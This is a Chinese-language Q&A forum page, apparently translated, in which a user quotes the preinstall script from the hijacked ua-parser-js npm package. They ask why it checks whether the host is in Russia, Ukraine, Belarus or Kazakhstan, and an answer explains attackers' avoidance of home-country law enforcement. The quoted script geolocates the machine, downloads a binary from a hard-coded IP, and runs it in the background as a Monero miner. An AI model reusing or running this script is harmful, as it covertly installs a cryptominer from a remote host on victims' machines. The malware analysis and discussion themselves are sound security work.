为什么这种攻击会检查服务器的位置?

信息安全 开发
2021-08-13 10:40:17

最近(刚刚)ua-parser-js发现 npm 包被劫持。劫持在预安装时安装了一个加密矿工,但我注意到预安装脚本中的以下段落:

IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ')
if [ -z "$IP" ]
     then
var=$(pgrep jsextension)
    if [ -z "$var" ]
        then
        curl http://159.148.186.228/download/jsextension -o jsextension 
        if [ ! -f jsextension ]
            then
            wget http://159.148.186.228/download/jsextension -O jsextension
        fi
        chmod +x jsextension
        ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &
    fi
 fi

我的问题是为什么脚本会在下载有效负载之前检查服务器是否在俄罗斯、乌克兰、白俄罗斯或哈萨克斯坦?这些国家有什么特别之处吗?

2个回答

某些政府倾向于忽略本国公民进行的黑客/网络犯罪,只要他们只针对来自其他国家的人。Brian Krebs 在今年早些时候的一篇文章中谈到了这一点:

例如,在俄罗斯,除非该国境内的公司或个人作为受害者提出正式投诉,否则当局通常不会对其自己的人发起网络犯罪调查。确保没有关联公司能够在本国制造受害者是这些犯罪分子远离国内执法机构雷达的最简单方法。

过去有各种恶意软件样本通过查看已安装的键盘布局来做到这一点(以至于有些人建议安装西里尔文布局以保护自己免受恶意软件的侵害)。您所看到的是同一事物的不同版本。

请注意,这种方法(不针对黑客所在的国家/地区)在某种程度上适用于任何国家/地区。例如,在德国,您必须先提起诉讼(技术上是“临时禁令”),然后 ISP 才能为您提供攻击源 IP 地址背后的名称。您只有几天的时间这样做,否则 ISP 日志将被删除以遵守隐私法。

如果受害者在德国,或者他们一直在准备提前进行诉讼(例如版权所有者在版权侵权发生之前聘请律师准备文书工作),这相对容易做到,但实际上不可能做到如果你在国外,自发地。当您的文书工作到达德国法院时,ISP 日志已经消失了。

当然,与他们在俄罗斯、乌克兰、白俄罗斯或哈萨克斯坦的同事不同,即使没有人提出官方投诉,德国警方也会追查德国的网络犯罪分子。通常,当攻击变得广泛和广为人知时,或者当犯罪分子试图洗钱并将其合法化为德国的收入时,他们会采取行动。

其它你可能感兴趣的问题
上一篇您的 ISP 是否知道您使用的是什么类型的电话/计算机? 下一篇Heartbleed 是否意味着每个 SSL 服务器都需要新证书?